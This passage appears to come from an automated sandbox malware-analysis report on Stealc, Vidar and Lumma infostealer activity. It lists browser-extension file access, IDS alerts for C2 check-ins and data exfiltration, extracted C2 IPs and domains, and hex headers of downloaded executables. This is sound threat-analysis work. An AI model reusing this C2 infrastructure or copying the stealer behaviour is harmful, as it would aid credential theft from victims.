Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+1Ch]	24_2_0040C000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	24_2_0040B810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-14h]	24_2_0043BC78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp]	24_2_0040CC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp]	24_2_0040C69D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	24_2_00413846
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000874h]	24_2_0041E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edx], cx	24_2_0041E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edx], cx	24_2_0041F862
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, dword ptr [edx+ebx+3Ch]	24_2_0043A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	24_2_004390C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	24_2_0043E8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	24_2_0043E080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	24_2_00413888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edx], cx	24_2_0041F8B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	24_2_0041F8B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	24_2_0041D940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	24_2_00431950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	24_2_00415172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	24_2_00415172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-24h]	24_2_00415172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [ebx]	24_2_0043F9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], 625B6034h	24_2_004211B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	24_2_00413A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000000D8h]	24_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+34h]	24_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+34h]	24_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+18h]	24_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	24_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	24_2_004122E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	24_2_0043F290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	24_2_00427B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	24_2_00423BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [ecx], ax	24_2_0041DBEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	24_2_0043E390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	24_2_0043D470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	24_2_0043DC70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	24_2_0041C400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	24_2_0041E411
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	24_2_004104D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+38h]	24_2_0040F578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp edx	24_2_0041CDED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [ebx+01h], 00000000h	24_2_0041CDED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	24_2_00424640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	24_2_0041C660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	24_2_00415E62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000000D8h]	24_2_0042866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	24_2_00403E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000874h]	24_2_0041E6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edx], cx	24_2_0041E6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	24_2_00423F07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	24_2_0043DF90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp edx	24_2_0043A796

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49702 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.7:49702 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 46.8.231.109:80 -> 192.168.2.7:49702
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.7:49702 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 46.8.231.109:80 -> 192.168.2.7:49702
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.7:49702 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2055475 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (condedqpwqm .shop) : 192.168.2.7:56010 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.7:49712 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.7:49715 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.7:49731 -> 147.45.68.138:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.68.138:80 -> 192.168.2.7:49731
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.68.138:80 -> 192.168.2.7:49731
Source: Network traffic	Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.7:49735 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.7:49736 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.7:49737 -> 95.164.119.162:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.68.138:80 -> 192.168.2.7:49741
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.68.138:80 -> 192.168.2.7:49741
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49736 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49736 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49712 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49735 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49712 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49735 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49715 -> 172.67.146.35:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49715 -> 172.67.146.35:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://46.8.231.109/c4754d4f680ead72.php
Source: Malware configuration extractor	URLs: locatedblsoqp.shop
Source: Malware configuration extractor	URLs: caffegclasiqwp.shop
Source: Malware configuration extractor	URLs: traineiwnqo.shop
Source: Malware configuration extractor	URLs: evoliutwoqm.shop
Source: Malware configuration extractor	URLs: millyscroqwp.shop
Source: Malware configuration extractor	URLs: stagedchheiqwo.shop
Source: Malware configuration extractor	URLs: condedqpwqm.shop
Source: Malware configuration extractor	URLs: stamppreewntnq.shop
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199761128941
Source: Malware configuration extractor	URLs: https://t.me/jamelwt

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Aug 2024 20:55:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Aug 2024 20:55:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Aug 2024 20:55:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Aug 2024 20:55:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 